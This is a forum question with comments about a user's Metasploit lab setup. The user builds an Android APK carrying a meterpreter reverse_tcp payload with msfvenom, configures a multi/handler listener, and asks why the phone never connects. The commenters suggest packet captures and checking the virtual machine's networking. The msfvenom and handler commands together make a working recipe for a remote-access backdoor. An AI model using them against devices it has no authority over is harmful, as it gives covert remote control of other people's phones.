# Android not connected to kali linux with meterpreter in metasploit

Tags: android, metasploit, meterpreter

I keep running into an error.

I create an apk:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > test.apk
```

In the console, I configure the multi/handler:

```
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 10.0.2.15
set LPORT 4444
exploit
```

But when install the apk in my android, not detect the connection for metasploit.
I think maybe something is wrong with the IP but this is what ifconfig give me. I use a virtual machine, I don't know if that can affect in my ip.

Comment: I hope I translated you accurately.

Comment: I think you will need to set up packet captures at the phone to see if the phone is trying to send out packets. From there, you will be able to troubleshoot your connections problems (always run a packet capture when troubleshooting network issues). Aside from that, there is not much we can do to help.

Comment: and you can tell how i can do that in my phone? :p

Comment: There are apps you can use on a rooted phone that will capture packets that are sent to the NIC, also, you can run Wireshark to capture the packets. If you want to hack mobile devices, being able to capture packets should be considered a requirement.

Comment: Please provide more info about the network structure and the android device.

Comment: Can you ping that host from your Android? If not, then you have a network config issue with the VM (and this question should probably be migrated to Super User).